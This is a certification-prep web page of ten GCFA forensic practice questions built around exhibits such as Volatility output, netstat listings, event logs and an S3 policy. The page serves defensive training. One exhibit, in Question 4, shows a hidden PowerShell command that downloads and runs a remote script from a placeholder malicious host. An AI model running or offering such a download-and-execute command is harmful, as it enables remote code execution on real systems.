Courseiva
← Back to GIAC Certified Forensic Analyst questions

Scenario-based practice

Refer to the Exhibit Practice Questions

Practise GIAC Certified Forensic Analyst practice questions — original exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

10
scenario questions
GCFA
exam code
GIAC
vendor

Scenario guide

How to approach refer to the exhibit practice questions

Practise exhibit-style questions that ask you to read a topology, table, command output or diagram before choosing the best answer.

Quick answer

Exhibit-style questions test whether you can read a topology, command output, diagram or table before choosing the best answer.

How to extract the relevant detail from an exhibit.

How topology, command output or routing information affects the answer.

How to avoid answering from memory before reading the evidence.

How to map the exhibit back to the exam objective.

Related practice questions

Related GCFA topic practice pages

Scenario questions usually connect to one or more exam topics. Use these links to review the underlying concepts behind the scenario.

Practice set

Practice scenarios

Question 1mediummultiple choice
Full question →

Based on the process metadata provided in the exhibit, what is the most significant indicator that requires further investigation?

Exhibit

Refer to the exhibit: { 'Process': 'svchost.exe', 'PID': 1234, 'ParentPID': 567, 'Path': 'C:\\Windows\\System32\\', 'StartTime': '2023-10-01T10:00:00Z', 'CommandLine': 'C:\\Windows\\System32\\svchost.exe -k netsvcs' }
Question 2hardmultiple choice
Full question →

Refer to the exhibit. What is the most significant finding based on the Volatility 'malfind' output?

Exhibit

Exhibit C: Volatility malfind output
PID: 2456 | Address: 0x00A00000 | Tag: VadS | Protection: PAGE_EXECUTE_READWRITE
Header: MZ
Content: 4D 5A 90 00 ...
Question 3mediummultiple choice
Full question →

Given the command-line exhibit, what is the best strategy to analyze the behavior of this process?

Exhibit

Refer to the exhibit: { 'EventID': 4688, 'ProcessName': 'powershell.exe', 'CommandLine': 'powershell.exe -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEgA... )' }
Question 4hardmultiple choice
Full question →

Refer to the exhibit. What is the most critical security concern presented by the second command line?

Exhibit

C:\Windows\System32\cmd.exe /c echo 'test' > C:\Users\Public\test.txt
cmd.exe /c "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://bad.com/a.ps1')"
Question 5hardmultiple choice
Full question →

Refer to the exhibit. An examiner observes the process tree provided. Given standard Windows operating system architecture, which specific observation indicates a high probability of malicious activity?

Exhibit

Exhibit A: Volatility pstree output
Name: svchost.exe | PID: 1240 | PPID: 988
Name: svchost.exe | PID: 1420 | PPID: 1240
Name: explorer.exe | PID: 1600 | PPID: 1240
Question 6mediummultiple choice
Full question →

Refer to the exhibit. An examiner discovers the VAD entry shown in the exhibit for a process. What is the most appropriate forensic conclusion regarding this memory segment?

Exhibit

Exhibit B: Volatility vadinfo output
Virtual Address: 0x00400000
Protection: PAGE_EXECUTE_READWRITE
File: None
Tag: VadS
Question 7mediummultiple choice
Full question →

Refer to the exhibit. An investigator observes the listed network connections on a compromised server. Which process warrants immediate investigation based on these connections?

Exhibit

C:\> netstat -ano | findstr "ESTABLISHED"
TCP 10.10.1.5:445 192.168.50.20:49152 ESTABLISHED 4
TCP 10.10.1.5:443 203.0.113.45:443 ESTABLISHED 4820
Question 8hardmultiple choice
Full question →

Refer to the exhibit. What can be inferred about the file activity?

Exhibit

USN Journal Entry:
Reason: Data_Extend | Timestamp: 2023-05-01 14:00:05
Reason: File_Create | Timestamp: 2023-05-01 14:00:01
Question 9mediummultiple choice
Full question →

Refer to the exhibit. An attacker attempts to use a compromised identity with this policy to modify a file in the 'sensitive-data' bucket. What is the expected outcome?

Exhibit

Policy: {
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::sensitive-data/*"
  }]
}
Question 10hardmultiple choice
Full question →

Refer to the exhibit. An analyst observes this process execution on a domain controller. What indicator suggests this activity is likely malicious?

Exhibit

C:\Windows\System32\svchost.exe -k netsvcs -p
Parent: C:\Windows\System32\services.exe
User: NT AUTHORITY\SYSTEM
Network: 192.168.1.5:49152 -> 45.33.22.11:443
State: ESTABLISHED

These GCFA practice questions are part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style GCFA questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.